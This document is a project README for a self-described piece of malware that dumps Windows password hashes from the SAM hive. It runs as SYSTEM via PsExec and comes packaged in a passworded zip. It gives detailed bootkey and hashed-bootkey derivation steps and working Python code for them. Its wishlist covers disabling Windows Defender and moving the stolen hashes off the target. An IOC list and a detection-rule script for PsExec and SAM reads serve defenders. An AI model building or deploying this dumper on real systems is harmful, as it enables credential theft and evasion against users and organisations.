DotNet-Dump

Description

Dump password hashes and other useful info via .NET

Design

This piece of rudimentary malware will be packaged with PsExec (from Sysinternals) along with a batch script that runs the program. The concept of operations (CONOP) is as follows:

  • The user downloads the packaged/zipped files onto the target computer
  • Upon unzipping, our batch file executes:
    • our .NET binary as SYSTEM via PsExec, and
    • our Python file, which parses the output generated by the dumper and produces the user hashes

Execution

Upon execution, this program will:

  • Parse the registry, specifically the SAM hive, for user password hashes
  • Dump the password information to files; the batch script then feeds this information into the follow-on script
  • Dump the passwords to the final output file; clean up and exit

Password Hashes

Local account NT hashes (commonly called NTLM hashes) on Windows are stored in the SAM hive and are recovered via the following steps:

  • Obtain the bootkey (requires SYSTEM-level privileges)
    • This is built from the class information (the key's class string, as returned by RegQueryInfoKey, not a value under the key) of four subkeys of HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa, where %03d is the current control set (HKEY_LOCAL_MACHINE\SYSTEM\Select\Current):
      • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\JD
      • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\Skew1
      • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\GBG
      • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet%03d\Control\Lsa\Data
    • Each class string is 8 hex characters; the four are concatenated in that order and hex-decoded to 16 bytes, and a fixed byte permutation is then applied to produce the bootkey. Concatenation alone gives the wrong key.
    • We also need HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\F for calculating the hashes: it holds the encrypted "hashed bootkey", which the bootkey decrypts (RC4 with an MD5-derived key on older systems, AES on newer Windows 10 builds and later)
  • Enumerate all user accounts stored under HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users (the subkey names are the hex RIDs of each user; skip the Names subkey)
    • Obtain the 'V' value for each user; it contains the encrypted LM/NT hashes
    • Derive the per-user key from the hashed bootkey and the RID, then decrypt the hashes (the last layer is DES keyed from the RID); the bootkey itself is never applied to the V data directly
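The first two steps of the chain above (bootkey from the Lsa class strings, then the hashed bootkey out of the F value), as an added Python example that is not part of this project's code. Only the RC4 layout of F (key-data revision 1) is implemented; the AES layout and the per-user V decryption, which additionally needs the RID-derived DES keys, are not shown. The class strings, salt and keys are constructed test values, and the F blob is built by the example itself rather than read from a hive:

```python
import hashlib

# Constants of the SAM key-derivation scheme; the trailing NULs are part of the hashed input.
QWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
DIGITS = b"0123456789012345678901234567890123456789\0"

# Fixed byte permutation applied after concatenating the four Lsa class strings.
BOOTKEY_PERMUTATION = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def bootkey_from_classes(jd: str, skew1: str, gbg: str, data: str) -> bytes:
    """Step 1: class strings of Lsa\\JD, Lsa\\Skew1, Lsa\\GBG, Lsa\\Data (8 hex chars each),
    concatenated in that order, hex-decoded, then permuted. Skipping the permutation is
    the classic mistake and yields a key that decrypts F to garbage."""
    scrambled = bytes.fromhex(jd + skew1 + gbg + data)
    if len(scrambled) != 16:
        raise ValueError("expected four 8-hex-character class strings")
    return bytes(scrambled[p] for p in BOOTKEY_PERMUTATION)


def hashed_bootkey_from_f(f_value: bytes, bootkey: bytes) -> bytes:
    """Step 2, RC4 layout (key-data revision 1 at offset 0x68): recover the 16-byte hashed
    bootkey from SAM\\SAM\\Domains\\Account\\F and verify its MD5 checksum. The AES layout
    (revision 2) used by newer Windows builds is not handled here."""
    if int.from_bytes(f_value[0x68:0x6C], "little") != 1:
        raise ValueError("F key-data revision is not 1 (RC4); AES layout not implemented")
    salt = f_value[0x70:0x80]
    encrypted = f_value[0x80:0xA0]          # 16-byte key followed by 16-byte checksum
    rc4_key = hashlib.md5(salt + QWERTY + bootkey + DIGITS).digest()
    hbk = rc4(rc4_key, encrypted)
    expected = hashlib.md5(hbk[:16] + DIGITS + hbk[:16] + QWERTY).digest()
    if hbk[16:] != expected:
        raise ValueError("checksum mismatch: wrong bootkey, or a Syskey startup password is in use")
    return hbk[:16]


def build_sample_f(bootkey: bytes, hashed_bootkey: bytes, salt: bytes) -> bytes:
    """Constructed F blob for offline testing; not captured from a real hive. Only the
    key-data block at 0x68 is populated; the domain policy fields before it stay zero."""
    rc4_key = hashlib.md5(salt + QWERTY + bootkey + DIGITS).digest()
    checksum = hashlib.md5(hashed_bootkey + DIGITS + hashed_bootkey + QWERTY).digest()
    f = bytearray(0xA8)
    f[0x68:0x6C] = (1).to_bytes(4, "little")            # revision 1 = RC4 layout
    f[0x70:0x80] = salt
    f[0x80:0xA0] = rc4(rc4_key, hashed_bootkey + checksum)
    return bytes(f)


def demo() -> dict:
    """Run both steps on constructed inputs (hypothetical class strings, salt and keys)."""
    bootkey = bootkey_from_classes("00010203", "04050607", "08090a0b", "0c0d0e0f")
    real_hbk = bytes.fromhex("a1" * 16)
    f_value = build_sample_f(bootkey, real_hbk, b"\x55" * 16)
    recovered = hashed_bootkey_from_f(f_value, bootkey)
    try:
        hashed_bootkey_from_f(f_value, bytes(16))   # a wrong bootkey must fail the checksum
        wrong_key_rejected = False
    except ValueError:
        wrong_key_rejected = True
    return {"bootkey": bootkey.hex(), "hashed_bootkey": recovered.hex(),
            "wrong_key_rejected": wrong_key_rejected}


if __name__ == "__main__":
    print(demo())
```

The checksum check is worth keeping in any real implementation: a mismatch is the only signal that the bootkey was assembled wrongly (for example, without the permutation) or that the machine uses a Syskey startup password, in which case the registry alone is not enough.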

Payload

The payload itself will be a zipped folder (password: infected!) containing four things:

  • Our .bat file, which runs our .NET program and the Python parsing file
  • PsExec, to execute in a SYSTEM context
  • Our .NET executable
  • Our Python file (compiled as an executable)
    • You can build Python files as executables via pyinstaller.exe --onefile -w <filename.py>

Indicators of Compromise (IOCs)

  • Files being written to the System32 directory
  • PsExec running (the PSEXESVC service is installed on the target) and a .NET executable running as SYSTEM
  • Sensitive registry keys being read: the SAM hive and the Lsa bootkey subkeys (JD, Skew1, GBG, Data)
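As an added example, not part of the project, the IOCs above turned into detection rules and run over a handful of constructed, simplified log events in Python. The field names are this example's own flattening of System log 7045 (service installed), Sysmon 1 (process create) and 11 (file create), and Security 4663 (object access) records, not a vendor schema, and the allowlist of processes expected to read SAM/Lsa keys is an assumption:

```python
import re

# Object paths worth alerting on: the SAM account database and the four Lsa subkeys
# whose class strings form the bootkey.
SENSITIVE_KEY = re.compile(
    r"\\REGISTRY\\MACHINE\\(SAM\\SAM\\Domains\\Account|"
    r"SYSTEM\\ControlSet\d{3}\\Control\\Lsa\\(JD|Skew1|GBG|Data))",
    re.IGNORECASE,
)
SYSTEM32_DIR = re.compile(r"^C:\\Windows\\System32\\", re.IGNORECASE)
WINDOWS_DIR = re.compile(r"^C:\\Windows\\", re.IGNORECASE)
SYSTEM_USER = r"NT AUTHORITY\SYSTEM"
# Processes assumed to touch SAM/Lsa keys during normal operation (example allowlist).
TRUSTED_REGISTRY_READERS = {r"c:\windows\system32\lsass.exe", r"c:\windows\system32\services.exe"}

# Constructed, simplified events (not real log captures).
SAMPLE_EVENTS = [
    {"source": "System", "event_id": 7045, "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"source": "Sysmon", "event_id": 1, "image": r"C:\Windows\PSEXESVC.exe",
     "user": SYSTEM_USER, "parent_image": r"C:\Windows\System32\services.exe"},
    {"source": "Sysmon", "event_id": 1, "image": r"C:\Users\bob\Downloads\dumper.exe",
     "user": SYSTEM_USER, "parent_image": r"C:\Windows\PSEXESVC.exe"},
    {"source": "Sysmon", "event_id": 11, "image": r"C:\Users\bob\Downloads\dumper.exe",
     "target_filename": r"C:\Windows\System32\samdump.txt"},
    {"source": "Security", "event_id": 4663,
     "object_name": r"\REGISTRY\MACHINE\SAM\SAM\Domains\Account\Users\000003E9\V",
     "process_name": r"C:\Users\bob\Downloads\dumper.exe", "accesses": "Read"},
    {"source": "Sysmon", "event_id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "user": r"DESKTOP\bob", "parent_image": r"C:\Windows\explorer.exe"},
]


def evaluate(events):
    """Return (rule_name, event) pairs for every event matching one of the IOC rules."""
    hits = []
    for e in events:
        src, eid = e["source"], e["event_id"]
        # PsExec installs a service named PSEXESVC on the target before running anything.
        if src == "System" and eid == 7045 and "psexesvc" in e["service_name"].lower():
            hits.append(("psexec_service_installed", e))
        # A binary outside C:\Windows started as SYSTEM with PSEXESVC as its parent:
        # the "dotnet executable running as SYSTEM" IOC.
        if (src == "Sysmon" and eid == 1 and e["user"] == SYSTEM_USER
                and e["parent_image"].lower().endswith(r"\psexesvc.exe")
                and not WINDOWS_DIR.match(e["image"])):
            hits.append(("non_windows_binary_as_system_via_psexec", e))
        # Something outside C:\Windows creating files in System32.
        if (src == "Sysmon" and eid == 11 and SYSTEM32_DIR.match(e["target_filename"])
                and not WINDOWS_DIR.match(e["image"])):
            hits.append(("system32_write_by_foreign_process", e))
        # Registry access audit hit on SAM or the bootkey subkeys by an untrusted process.
        if (src == "Security" and eid == 4663 and SENSITIVE_KEY.search(e["object_name"])
                and e["process_name"].lower() not in TRUSTED_REGISTRY_READERS):
            hits.append(("sam_or_lsa_key_read", e))
    return hits


if __name__ == "__main__":
    for rule, event in evaluate(SAMPLE_EVENTS):
        print(rule, "<-", event)
```

The registry rule only fires if the SAM and Lsa keys carry an audit SACL and the "Audit Registry" subcategory is enabled, since Windows does not log registry reads otherwise; without that, the PSEXESVC service install and the SYSTEM child process are the reliable signals.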

Wishlist

  • Survey the target for signs of Windows Defender and attempt to disable it
  • Clean up after the files execute
  • Transport the hashes file off the target, or send the hashes directly
